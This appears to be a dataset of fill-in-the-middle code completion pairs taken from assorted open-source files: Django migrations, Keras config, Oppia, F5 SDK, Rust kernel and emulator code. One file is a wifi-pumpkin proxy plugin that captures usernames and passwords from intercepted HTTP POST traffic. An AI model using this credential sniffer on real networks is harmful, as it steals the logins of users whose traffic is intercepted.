prompt (large_string, lengths 70–991k) | completion (large_string, lengths 0–1.02k) |
---|---|
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright 2016 ACSONE SA/NV (<http://acsone.eu>)<|fim▁hole|># License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from . import mass_mailing_stats<|fim▁end|>
| |
<|file_name|>dump_post_data.py<|end_file_name|><|fim▁begin|>from plugins.extension.plugin import PluginTemplate
from mitmproxy.models import decoded
from PyQt4.QtCore import QObject,pyqtSignal
import re
"""
Description:
This program is a core file for wifi-pumpkin.py which includes functionality
plugins for Pumpkin-Proxy.
Copyright:<|fim▁hole|> This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
"""
class dump_post_data(PluginTemplate):
meta = {
'Name' : 'dump_post_data',
'Version' : '1.0',
'Description' : 'Getting HTTP post data capture login post and logout pre event hook and it is working in web',
'Author' : 'Marcos Nesster'
}
def __init__(self):
for key,value in self.meta.items():
self.__dict__[key] = value
self.ConfigParser = False
def get_password_POST(self, content):
user = None
passwd = None
# Taken mainly from Pcredz by Laurent Gaffie
userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name',
'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename',
'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username',
'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in']
passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword',
'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password',
'passwort', 'passwrd', 'wppassword', 'upasswd']
for login in userfields:
login_re = re.search('(%s=[^&]+)' % login, content, re.IGNORECASE)
if login_re:
user = login_re.group()
for passfield in passfields:
pass_re = re.search('(%s=[^&]+)' % passfield, content, re.IGNORECASE)
if pass_re:
passwd = pass_re.group()
if user and passwd:
return (user, passwd)
def request(self, flow):
self.send_output.emit("FOR: " + flow.request.url +" "+ flow.request.method + " " + flow.request.path + " " + flow.request.http_version)
with decoded(flow.request):
user_passwd = self.get_password_POST(flow.request.content)
if user_passwd != None:
try:
http_user = user_passwd[0].decode('utf8')
http_pass = user_passwd[1].decode('utf8')
# Set a limit on how long they can be to prevent false positives
if len(http_user) > 75 or len(http_pass) > 75:
return
self.send_output.emit("\n[{}][HTTP REQUEST HEADERS]\n".format(self.Name))
for name, value in flow.request.headers.iteritems():
self.send_output.emit('{}: {}'.format(name, value))
self.send_output.emit( 'HTTP username: %s' % http_user)
self.send_output.emit( 'HTTP password: %s\n' % http_pass)
except UnicodeDecodeError:
pass
def response(self, flow):
pass<|fim▁end|>
|
Copyright (C) 2015-2016 Marcos Nesster P0cl4bs Team
|
<|file_name|>classMethods.ts<|end_file_name|><|fim▁begin|>class A {
<|fim▁hole|> a(): void {
}
b(a: string): number {
return 0;
}
}<|fim▁end|>
| |
<|file_name|>stackedsplinearea.d.ts<|end_file_name|><|fim▁begin|>/*!
* devextreme-angular
* Version: 16.2.5
* Build date: Tue Feb 28 2017
*
* Copyright (c) 2012 - 2017 Developer Express Inc. ALL RIGHTS RESERVED
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file in the root of the project for details.
*
* https://github.com/DevExpress/devextreme-angular
*/
import { NestedOptionHost } from '../../core/nested-option';
import { DxoChartCommonSeriesSettings } from './base/chart-common-series-settings';<|fim▁hole|>}
export declare class DxoStackedsplineareaModule {
}<|fim▁end|>
|
export declare class DxoStackedsplineareaComponent extends DxoChartCommonSeriesSettings {
protected readonly _optionPath: string;
constructor(parentOptionHost: NestedOptionHost, optionHost: NestedOptionHost);
|
<|file_name|>0066_issue_force_free_access.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-20 22:01
from __future__ import unicode_literals
from django.db import migrations, models
<|fim▁hole|> ('erudit', '0065_auto_20170202_1152'),
]
operations = [
migrations.AddField(
model_name='issue',
name='force_free_access',
field=models.BooleanField(default=False, verbose_name='Contraindre en libre accès'),
),
]<|fim▁end|>
|
class Migration(migrations.Migration):
dependencies = [
|
<|file_name|>config_nmta.py<|end_file_name|><|fim▁begin|>from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from keras.optimizers import SGD
from keras.optimizers import Adam
from keras.optimizers import adadelta
from keras.optimizers import rmsprop
from keras.layers import Layer
from keras import backend as K
K.set_image_dim_ordering('tf')
import socket
import os
# -------------------------------------------------
# Background config:
hostname = socket.gethostname()
if hostname == 'baymax':
path_var = 'baymax/'
elif hostname == 'walle':
path_var = 'walle/'
elif hostname == 'bender':
path_var = 'bender/'
else:
path_var = 'zhora/'
DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_128/train/'
# DATA_DIR= '/local_home/data/KITTI_data/'
HD_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_256/train/'
VAL_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_128/val/'
VAL_HD_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_256/val/'
TEST_DATA_DIR= '/local_home/JAAD_Dataset/iros/resized_imgs_128/test/'
MODEL_DIR = './../' + path_var + 'models'
if not os.path.exists(MODEL_DIR):
os.mkdir(MODEL_DIR)
CHECKPOINT_DIR = './../' + path_var + 'checkpoints'
if not os.path.exists(CHECKPOINT_DIR):
os.mkdir(CHECKPOINT_DIR)
ATTN_WEIGHTS_DIR = './../' + path_var + 'attn_weights'
if not os.path.exists(ATTN_WEIGHTS_DIR):
os.mkdir(ATTN_WEIGHTS_DIR)
GEN_IMAGES_DIR = './../' + path_var + 'generated_images'
if not os.path.exists(GEN_IMAGES_DIR):
os.mkdir(GEN_IMAGES_DIR)
CLA_GEN_IMAGES_DIR = GEN_IMAGES_DIR + '/cla_gen/'
if not os.path.exists(CLA_GEN_IMAGES_DIR):
os.mkdir(CLA_GEN_IMAGES_DIR)
LOG_DIR = './../' + path_var + 'logs'
if not os.path.exists(LOG_DIR):
os.mkdir(LOG_DIR)
TF_LOG_DIR = './../' + path_var + 'tf_logs'
if not os.path.exists(TF_LOG_DIR):
os.mkdir(TF_LOG_DIR)
TF_LOG_GAN_DIR = './../' + path_var + 'tf_gan_logs'
if not os.path.exists(TF_LOG_GAN_DIR):
os.mkdir(TF_LOG_GAN_DIR)
TEST_RESULTS_DIR = './../' + path_var + 'test_results'
if not os.path.exists(TEST_RESULTS_DIR):
os.mkdir(TEST_RESULTS_DIR)
PRINT_MODEL_SUMMARY = True
SAVE_MODEL = True
PLOT_MODEL = True
SAVE_GENERATED_IMAGES = True
SHUFFLE = True
VIDEO_LENGTH = 30
IMG_SIZE = (128, 128, 3)
ADVERSARIAL = False
BUF_SIZE = 10
LOSS_WEIGHTS = [1, 1]
ATTN_COEFF = 0
KL_COEFF = 0
# -------------------------------------------------
# Network configuration:
print ("Loading network/training configuration.")
print ("Config file: " + str(__name__))
BATCH_SIZE = 7
NB_EPOCHS_AUTOENCODER = 30<|fim▁hole|>
OPTIM_A = Adam(lr=0.0001, beta_1=0.5)
OPTIM_G = Adam(lr=0.00001, beta_1=0.5)
# OPTIM_D = Adam(lr=0.000001, beta_1=0.5)
# OPTIM_D = SGD(lr=0.000001, momentum=0.5, nesterov=True)
OPTIM_D = rmsprop(lr=0.000001)
lr_schedule = [10, 20, 30] # epoch_step
def schedule(epoch_idx):
if (epoch_idx + 1) < lr_schedule[0]:
return 0.0001
elif (epoch_idx + 1) < lr_schedule[1]:
return 0.0001 # lr_decay_ratio = 10
elif (epoch_idx + 1) < lr_schedule[2]:
return 0.00001
return 0.000001<|fim▁end|>
|
NB_EPOCHS_GAN = 0
|
<|file_name|>CollectionRightsObjectFactory.ts<|end_file_name|><|fim▁begin|>// Copyright 2016 The Oppia Authors. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS-IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
/**
* @fileoverview Factory for creating and mutating instances of frontend
* collection rights domain objects.
*/
import cloneDeep from 'lodash/cloneDeep';
import { downgradeInjectable } from '@angular/upgrade/static';
import { Injectable } from '@angular/core';
export interface CollectionRightsBackendDict {
'collection_id': number;
'can_edit': boolean;
'can_unpublish': boolean;
'is_private': boolean;
'owner_names': string[];
}<|fim▁hole|> _collectionId: number;
_canEdit: boolean;
_canUnpublish: boolean;
_isPrivate: boolean;
_ownerNames: string[];
constructor(collectionRightsObject: CollectionRightsBackendDict) {
this._collectionId = collectionRightsObject.collection_id;
this._canEdit = collectionRightsObject.can_edit;
this._canUnpublish = collectionRightsObject.can_unpublish;
this._isPrivate = collectionRightsObject.is_private;
this._ownerNames = collectionRightsObject.owner_names;
}
getCollectionId(): number {
return this._collectionId;
}
// Returns true if the user can edit the collection. This property is
// immutable.
canEdit(): boolean {
return this._canEdit;
}
// Returns true if the user can unpublish the collection.
canUnpublish(): boolean {
return this._canUnpublish;
}
// Returns true if the collection is private.
isPrivate(): boolean {
return this._isPrivate;
}
// Returns true if the collection is public.
isPublic(): boolean {
return !this._isPrivate;
}
// Sets isPrivate to false only if the user can edit the corresponding
// collection.
setPublic(): void {
if (this.canEdit()) {
this._isPrivate = false;
} else {
throw new Error('User is not allowed to edit this collection.');
}
}
// Sets isPrivate to true only if canUnpublish and canEdit are both true.
setPrivate(): void {
if (this.canEdit() && this.canUnpublish()) {
this._isPrivate = true;
} else {
throw new Error('User is not allowed to unpublish this collection.');
}
}
// Returns the owner names of the collection. This property is immutable.
getOwnerNames(): string[] {
return cloneDeep(this._ownerNames);
}
// Returns the reference to the internal ownerNames array; this function is
// only meant to be used for Angular bindings and should never be used in
// code. Please use getOwnerNames() and related functions, instead. Please
// also be aware this exposes internal state of the collection rights domain
// object, so changes to the array itself may internally break the domain
// object.
getBindableOwnerNames(): string[] {
return this._ownerNames;
}
// Reassigns all values within this collection to match the existing
// collection rights. This is performed as a deep copy such that none of the
// internal, bindable objects are changed within this collection rights.
// Note that the collection nodes within this collection will be completely
// redefined as copies from the specified collection rights.
copyFromCollectionRights(otherCollectionRights: CollectionRights): void {
this._collectionId = otherCollectionRights.getCollectionId();
this._canEdit = otherCollectionRights.canEdit();
this._isPrivate = otherCollectionRights.isPrivate();
this._canUnpublish = otherCollectionRights.canUnpublish();
this._ownerNames = otherCollectionRights.getOwnerNames();
}
}
@Injectable({
providedIn: 'root'
})
export class CollectionRightsObjectFactory {
// Static class methods. Note that "this" is not available in static
// contexts. This function takes a JSON object which represents a backend
// collection python dict.
create(
collectionRightsBackendObject: CollectionRightsBackendDict):
CollectionRights {
return new CollectionRights(cloneDeep(collectionRightsBackendObject));
}
// Create a new, empty collection rights object. This is not guaranteed to
// pass validation tests.
createEmptyCollectionRights(): CollectionRights {
return new CollectionRights({
owner_names: [],
collection_id: null,
can_edit: null,
can_unpublish: null,
is_private: null
});
}
}
angular.module('oppia').factory(
'CollectionRightsObjectFactory',
downgradeInjectable(CollectionRightsObjectFactory));<|fim▁end|>
|
export class CollectionRights {
|
<|file_name|>tunnels.py<|end_file_name|><|fim▁begin|># coding=utf-8
#
# Copyright 2016 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""BIG-IP® Network tunnels module.
REST URI
``http://localhost/mgmt/tm/net/tunnels``
GUI Path
``Network --> tunnels``
REST Kind
``tm:net:tunnels:*``
"""
from f5.bigip.resource import Collection
from f5.bigip.resource import OrganizingCollection
from f5.bigip.resource import Resource
class TunnelS(OrganizingCollection):
"""BIG-IP® network tunnels collection"""
def __init__(self, net):
super(TunnelS, self).__init__(net)
self._meta_data['allowed_lazy_attributes'] = [
Gres,
Tunnels,
Vxlans,
]
class Tunnels(Collection):
"""BIG-IP® network tunnels resource (collection for GRE, Tunnel, VXLANs"""
def __init__(self, tunnelS):
super(Tunnels, self).__init__(tunnelS)
self._meta_data['allowed_lazy_attributes'] = [Gres, Tunnel, Vxlans]
self._meta_data['attribute_registry'] =\
{'tm:net:tunnels:tunnel:tunnelstate': Tunnel}
class Tunnel(Resource):
"""BIG-IP® tunnels tunnel resource"""
def __init__(self, tunnels):
super(Tunnel, self).__init__(tunnels)
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_json_kind'] =\
'tm:net:tunnels:tunnel:tunnelstate'
class Gres(Collection):
"""BIG-IP® tunnels GRE sub-collection"""
def __init__(self, tunnels):
super(Gres, self).__init__(tunnels)
self._meta_data['allowed_lazy_attributes'] = [Gre]
self._meta_data['attribute_registry'] =\
{'tm:net:tunnels:gre:grestate': Gre}
class Gre(Resource):
"""BIG-IP® tunnels GRE sub-collection resource"""
def __init__(self, gres):
super(Gre, self).__init__(gres)<|fim▁hole|> self._meta_data['required_json_kind'] =\
'tm:net:tunnels:gre:grestate'
class Vxlans(Collection):
"""BIG-IP® tunnels VXLAN sub-collection"""
def __init__(self, tunnels):
super(Vxlans, self).__init__(tunnels)
self._meta_data['allowed_lazy_attributes'] = [Vxlan]
self._meta_data['attribute_registry'] =\
{'tm:net:tunnels:vxlan:vxlanstate': Vxlan}
class Vxlan(Resource):
"""BIG-IP® tunnels VXLAN sub-collection resource"""
def __init__(self, vxlans):
super(Vxlan, self).__init__(vxlans)
self._meta_data['required_creation_parameters'].update(('partition',))
self._meta_data['required_json_kind'] =\
'tm:net:tunnels:vxlan:vxlanstate'<|fim▁end|>
|
self._meta_data['required_creation_parameters'].update(('partition',))
|
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>// Type definitions for tiny-async-pool 1.0
// Project: https://github.com/rxaviers/async-pool#readme
// Definitions by: Karl-Philipp Wulfert <https://github.com/krlwlfrt>
// Definitions: https://github.com/DefinitelyTyped/DefinitelyTyped
/**
* This declaration specifies that the function is the exported object from the file
*/
export = asyncPool;
/**
* Runs multiple promise-returning & async functions in a limited concurrency pool.
* It rejects immediately as soon as one of the promises rejects.
* It resolves when all the promises complete.
* It calls the iterator function as soon as possible (under concurrency limit).
*
* @param poolLimit The pool limit number (>= 1).
* @param array Input array.
* @param iteratorFn Iterator function that takes two arguments (array item and the array itself).
* The iterator function should either return a promise or be an async function.<|fim▁hole|> */
declare function asyncPool<IN, OUT>(
poolLimit: number,
array: ReadonlyArray<IN>,
iteratorFn: (generator: IN) => Promise<OUT>
): Promise<OUT[]>;<|fim▁end|>
|
*
* @template IN Type of the input array
* @template OUT Type of the resolves of the promises
|
<|file_name|>context.rs<|end_file_name|><|fim▁begin|>use alloc::arc::Arc;
use alloc::boxed::Box;
use collections::{BTreeMap, Vec};
use spin::Mutex;
use arch;
use context::file::File;
use context::memory::{Grant, Memory, SharedMemory, Tls};
use syscall::data::Event;
use sync::{WaitMap, WaitQueue};
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
pub enum Status {
Runnable,
Blocked,
Exited(usize)
}
/// A context, which identifies either a process or a thread
#[derive(Debug)]
pub struct Context {
/// The ID of this context
pub id: usize,<|fim▁hole|> /// The ID of the parent context
pub ppid: usize,
/// The real user id
pub ruid: u32,
/// The real group id
pub rgid: u32,
/// The effective user id
pub euid: u32,
/// The effective group id
pub egid: u32,
/// Status of context
pub status: Status,
/// Context running or not
pub running: bool,
/// CPU ID, if locked
pub cpu_id: Option<usize>,
/// Context is halting parent
pub vfork: bool,
/// Context is being waited on
pub waitpid: Arc<WaitMap<usize, usize>>,
/// Context should wake up at specified time
pub wake: Option<(u64, u64)>,
/// The architecture specific context
pub arch: arch::context::Context,
/// Kernel FX
pub kfx: Option<Box<[u8]>>,
/// Kernel stack
pub kstack: Option<Box<[u8]>>,
/// Executable image
pub image: Vec<SharedMemory>,
/// User heap
pub heap: Option<SharedMemory>,
/// User stack
pub stack: Option<Memory>,
/// User Tls
pub tls: Option<Tls>,
/// User grants
pub grants: Arc<Mutex<Vec<Grant>>>,
/// The name of the context
pub name: Arc<Mutex<Vec<u8>>>,
/// The current working directory
pub cwd: Arc<Mutex<Vec<u8>>>,
/// Kernel events
pub events: Arc<WaitQueue<Event>>,
/// The process environment
pub env: Arc<Mutex<BTreeMap<Box<[u8]>, Arc<Mutex<Vec<u8>>>>>>,
/// The open files in the scheme
pub files: Arc<Mutex<Vec<Option<File>>>>
}
impl Context {
/// Create a new context
pub fn new(id: usize) -> Context {
Context {
id: id,
ppid: 0,
ruid: 0,
rgid: 0,
euid: 0,
egid: 0,
status: Status::Blocked,
running: false,
cpu_id: None,
vfork: false,
waitpid: Arc::new(WaitMap::new()),
wake: None,
arch: arch::context::Context::new(),
kfx: None,
kstack: None,
image: Vec::new(),
heap: None,
stack: None,
tls: None,
grants: Arc::new(Mutex::new(Vec::new())),
name: Arc::new(Mutex::new(Vec::new())),
cwd: Arc::new(Mutex::new(Vec::new())),
events: Arc::new(WaitQueue::new()),
env: Arc::new(Mutex::new(BTreeMap::new())),
files: Arc::new(Mutex::new(Vec::new()))
}
}
pub fn canonicalize(&self, path: &[u8]) -> Vec<u8> {
if path.iter().position(|&b| b == b':').is_none() {
let cwd = self.cwd.lock();
if path == b"." {
cwd.clone()
} else if path == b".." {
cwd[..cwd[..cwd.len() - 1]
.iter().rposition(|&b| b == b'/' || b == b':')
.map_or(cwd.len(), |i| i + 1)]
.to_vec()
} else if path.starts_with(b"./") {
let mut canon = cwd.clone();
if ! canon.ends_with(b"/") {
canon.push(b'/');
}
canon.extend_from_slice(&path[2..]);
canon
} else if path.starts_with(b"../") {
let mut canon = cwd[..cwd[..cwd.len() - 1]
.iter().rposition(|&b| b == b'/' || b == b':')
.map_or(cwd.len(), |i| i + 1)]
.to_vec();
canon.extend_from_slice(&path[3..]);
canon
} else if path.starts_with(b"/") {
let mut canon = cwd[..cwd.iter().position(|&b| b == b':').map_or(1, |i| i + 1)].to_vec();
canon.extend_from_slice(&path);
canon
} else {
let mut canon = cwd.clone();
if ! canon.ends_with(b"/") {
canon.push(b'/');
}
canon.extend_from_slice(&path);
canon
}
} else {
path.to_vec()
}
}
pub fn block(&mut self) -> bool {
if self.status == Status::Runnable {
self.status = Status::Blocked;
true
} else {
false
}
}
pub fn unblock(&mut self) -> bool {
if self.status == Status::Blocked {
self.status = Status::Runnable;
if let Some(cpu_id) = self.cpu_id {
if cpu_id != ::cpu_id() {
// Send IPI if not on current CPU
// TODO: Make this more architecture independent
unsafe { arch::device::local_apic::LOCAL_APIC.ipi(cpu_id) };
}
}
true
} else {
false
}
}
/// Add a file to the lowest available slot.
/// Return the file descriptor number or None if no slot was found
pub fn add_file(&self, file: File) -> Option<usize> {
let mut files = self.files.lock();
for (i, mut file_option) in files.iter_mut().enumerate() {
if file_option.is_none() {
*file_option = Some(file);
return Some(i);
}
}
let len = files.len();
if len < super::CONTEXT_MAX_FILES {
files.push(Some(file));
Some(len)
} else {
None
}
}
/// Get a file
pub fn get_file(&self, i: usize) -> Option<File> {
let files = self.files.lock();
if i < files.len() {
files[i]
} else {
None
}
}
/// Remove a file
// TODO: adjust files vector to smaller size if possible
pub fn remove_file(&self, i: usize) -> Option<File> {
let mut files = self.files.lock();
if i < files.len() {
files[i].take()
} else {
None
}
}
}<|fim▁end|>
| |
<|file_name|>artifacts.py<|end_file_name|><|fim▁begin|>import re
from django import template
from django.template.loader import get_template<|fim▁hole|>
INSTALLED_ARTIFACTS = dict()
def install(artifact_class):
INSTALLED_ARTIFACTS[artifact_class.key] = artifact_class
def find(data):
from fir_artifacts.models import ArtifactBlacklistItem
result = dict()
for key in INSTALLED_ARTIFACTS:
blacklist = ArtifactBlacklistItem.objects.filter(type=key).values_list('value', flat=True)
values = INSTALLED_ARTIFACTS[key].find(data)
values = [v for v in values if v not in blacklist]
result[key] = values
return result
def after_save(type, value, event):
return INSTALLED_ARTIFACTS[type].after_save(value, event)
def incs_for_art(art_string):
from fir_artifacts.models import Artifact
artifacts = Artifact.objects.filter(value__contains=art_string)
incs = []
for a in artifacts:
incs.extend(a.relations.all())
return incs
def all_for_object(obj, raw=False, user=None):
result = []
total_count = 0
correlated_count = 0
if not hasattr(obj, "artifacts"):
return (result, total_count, correlated_count)
for artifact in INSTALLED_ARTIFACTS:
values = obj.artifacts.filter(type=artifact)
artifact_collection = INSTALLED_ARTIFACTS[artifact](values, obj, user=user)
total_count += values.count()
correlated_count += artifact_collection.correlated_count()
result.append(artifact_collection)
return (result, total_count, correlated_count)
class AbstractArtifact:
case_sensitive = False
template = 'fir_artifacts/default.html'
@classmethod
def find(cls, data):
results = []
for i in re.finditer(cls.regex, data):
if cls.case_sensitive:
results.append(i.group('search'))
else:
results.append(i.group('search').lower())
return results
@classmethod
def after_save(cls, value, event):
# Do nothing, allows for specific callback in subclasses
pass
def __init__(self, artifacts, event, user=None):
class ArtifactDisplay(object):
def __init__(self, artifact, user):
self.artifact = artifact
self.correlation_count = self.artifact.relations_for_user(user).count()
@property
def value(self):
return self.artifact.value
@property
def type(self):
return self.artifact.type
@property
def id(self):
return self.artifact.id
@property
def pk(self):
return self.artifact.pk
self._artifacts = [ArtifactDisplay(artifact, user) for artifact in artifacts]
self._event = event
self._correlated = []
for artifact in self._artifacts:
if artifact.correlation_count > 1:
self._correlated.append(artifact)
def json(self, request):
return self.display(request, correlated=False, json=True)
def display(self, request, correlated=False, json=False):
context = RequestContext(request)
template = get_template(self.__class__.template)
context['artifact_name'] = self.__class__.display_name
if correlated:
context['artifact_values'] = self._correlated
else:
context['artifact_values'] = self._artifacts
context['event'] = self._event
if not json:
return template.render(context.flatten(), request)
else:
return context.flatten()
def correlated_count(self):
return len(self._correlated)<|fim▁end|>
|
from django.template import RequestContext
register = template.Library()
|
<|file_name|>testlibbind_ns_msg.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
#
# testlibbind_ns_msg.py - Unit tests for the libbind ns_msg wrapper
#
# This file is part of Strangle.
#
# Strangle is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Strangle is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Strangle; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import sys, testutils, random
import unittest
from Strangle import libbind
class ns_msgTestCase(unittest.TestCase):
"""Tests for the wrapper around the libbind ns_msg struct"""
def test000Exists(self):
"""Check that the ns_msg type object exists cleanly in the module"""
assert(libbind.ns_msg.__class__ is type)
def testInstantiate(self):
"""Check that the ns_msg type accepts the correct arguments"""
# Too few
self.assertRaises(TypeError, libbind.ns_msg)
# Too many
self.assertRaises(TypeError, libbind.ns_msg, 'one', 'two')
def testNoticeInvalid(self):
"""Test whether the ns_msg type can handle bad data"""
rng = testutils.rng
for testNum in range(0, 50):
packetLength = random.randrange(20, 80)
packetVal = rng.read(packetLength)
self.assertRaises(TypeError, libbind.ns_msg, packetVal)
def testParseValidQuery(self):
"""Test whether ns_msg initialization parses valid NS queries"""
packetData = file("data/www.company.example-query").read()
n = libbind.ns_msg(packetData)
assert(type(n) is libbind.ns_msg)
def testParseValidResponse(self):
"""Test whether ns_msg initialization parses valid NS queries"""
packetData = file("data/www.company.example-response").read()
n = libbind.ns_msg(packetData)<|fim▁hole|> s = unittest.TestSuite()
s.addTest( unittest.makeSuite(ns_msgTestCase, 'test') )
return s
if __name__ == "__main__":
unittest.main()<|fim▁end|>
|
assert(type(n) is libbind.ns_msg)
def suite():
|
<|file_name|>0013_auto_20180516_1559.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2018-05-16 18:59
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0012_auto_20180227_0858'),
]
operations = [
migrations.AlterModelOptions(
name='user',<|fim▁hole|><|fim▁end|>
|
options={'ordering': ('first_name', 'last_name'), 'permissions': (('menu_dados_auxiliares', 'Mostrar Menu Dados Auxiliares'), ('menu_tabelas_auxiliares', 'Mostrar Menu de Tabelas Auxiliares'), ('menu_contatos', 'Mostrar Menu de Cadastro de Contatos'), ('menu_grupocontatos', 'Mostrar Menu de Cadastro de Grupos de Contatos'), ('menu_processos', 'Mostrar Menu de Cadastro de Processos'), ('menu_area_trabalho', 'Mostrar Menu de Áreas de Trabalho'), ('menu_impresso_enderecamento', 'Mostrar Menu de Impressos de Endereçamento'), ('menu_relatorios', 'Mostrar Menu de Relatórios'), ('menu_administracao', 'Mostrar Menu de Administração'), ('menu_agenda', 'Mostrar Menu da Agenda de Eventos'))},
),
]
|
<|file_name|>dto.rs<|end_file_name|><|fim▁begin|>use game_status::PlayerName;
use card::Card;
use card::Suit;
use card::dto::CardDto;
use deal::Deal;
use deal::DealCard;
use error::Error;
use error::Result;
use std::convert::TryFrom;
use std::str::FromStr;
#[derive(Serialize, Deserialize, Debug)]
pub struct DealDto {
#[serde(rename = "DealNumber")]
deal_number: u32,
#[serde(rename = "Initiator", default)]
initiator: Option<PlayerName>,
#[serde(rename = "SuitType")]
suit_type: String,
#[serde(rename = "DealCards", default)]
deal_cards: Vec<DealCardDto>,
#[serde(rename = "DealWinner", default)]
deal_winner: Option<PlayerName>,
}
impl TryFrom<DealDto> for Deal {
type Error = Error;
fn try_from(dto: DealDto) -> Result<Deal> {
let deal_cards = dto.deal_cards
.into_iter()
.map(DealCard::try_from)
.collect::<Result<Vec<DealCard>>>()?;
let suit = Suit::from_str(&dto.suit_type)?;
Ok(Deal {
deal_number: dto.deal_number,
initiator: dto.initiator,
suit: if deal_cards.is_empty() {
None
} else {
Some(suit)
},
deal_cards: deal_cards,
deal_winner: dto.deal_winner,
})
}
}
impl<'a> From<&'a Deal> for DealDto {
fn from(deal: &'a Deal) -> DealDto {
DealDto {
deal_number: deal.deal_number,
initiator: deal.initiator.clone(),
suit_type: deal.suit.unwrap_or(Suit::Club).into(),
deal_cards: deal.deal_cards.iter().map(DealCardDto::from).collect(),
deal_winner: deal.deal_winner.clone(),
}
}
}
#[derive(Serialize, Deserialize, Debug)]
pub struct DealCardDto {
#[serde(rename = "TeamName")]
team_name: PlayerName,
#[serde(rename = "Card")]
card: CardDto,
}
impl TryFrom<DealCardDto> for DealCard {
type Error = Error;
fn try_from(dto: DealCardDto) -> Result<DealCard> {
Ok(DealCard {
player_name: dto.team_name.clone(),
card: Card::try_from(dto.card)?,
})
}
}
<|fim▁hole|> fn from(deal_card: &'a DealCard) -> DealCardDto {
DealCardDto {
team_name: deal_card.player_name.clone(),
card: CardDto::from(&deal_card.card),
}
}
}<|fim▁end|>
|
impl<'a> From<&'a DealCard> for DealCardDto {
|
<|file_name|>envelope.rs<|end_file_name|><|fim▁begin|>//! Envelope function used by sounds 1, 2 and 4
use spu::{Sample, SOUND_MAX};
#[derive(Clone,Copy)]
pub struct Envelope {
direction: EnvelopeDirection,
volume: Volume,
step_duration: u32,
counter: u32,
}
impl Envelope {
pub fn from_reg(val: u8) -> Envelope {
let vol = Volume::from_field(val >> 4);
let dir =
match val & 8 != 0 {
true => EnvelopeDirection::Up,
false => EnvelopeDirection::Down,
};
let l = (val & 7) as u32;
Envelope {
direction: dir,
volume: vol,
step_duration: l * 0x10000,
counter: 0,
}
}
pub fn into_reg(&self) -> u8 {
let vol = self.volume.into_field();
let dir = self.direction as u8;
let l = (self.step_duration / 0x10000) as u8;
(vol << 4) | (dir << 3) | l
}
pub fn step(&mut self) {
if self.step_duration == 0 {
// If the step duration is 0 the envelope is not active
return;
}
self.counter += 1;
self.counter %= self.step_duration;
if self.counter == 0 {
// Move on to the next step
match self.direction {
EnvelopeDirection::Up => self.volume.up(),
EnvelopeDirection::Down => self.volume.down(),
}
}
}
pub fn into_sample(&self) -> Sample {
self.volume.into_sample()
}
/// DAC is disabled when envelope direction goes down and volume is 0
pub fn dac_enabled(&self) -> bool {
self.direction != EnvelopeDirection::Down ||
self.volume.into_sample() != 0
}
}
// Sound envelopes can become louder or quieter
#[derive(Clone,Copy,PartialEq,Eq)]
pub enum EnvelopeDirection {
// Volume increases at each step
Up = 1,
// Volume decreases at each step
Down = 0,
}
/// The game boy sound uses 4bit DACs and can therefore only output 16
/// sound levels
#[derive(Clone,Copy)]
struct Volume(u8);
impl Volume {
fn from_field(vol: u8) -> Volume {
if vol > SOUND_MAX {
panic!("Volume out of range: {}", vol);
}
Volume(vol)
}
fn into_field(self) -> u8 {
let Volume(v) = self;
v
}
/// Convert from 4-bit volume value to Sample range
fn into_sample(self) -> Sample {
let Volume(v) = self;
v as Sample
}
<|fim▁hole|>
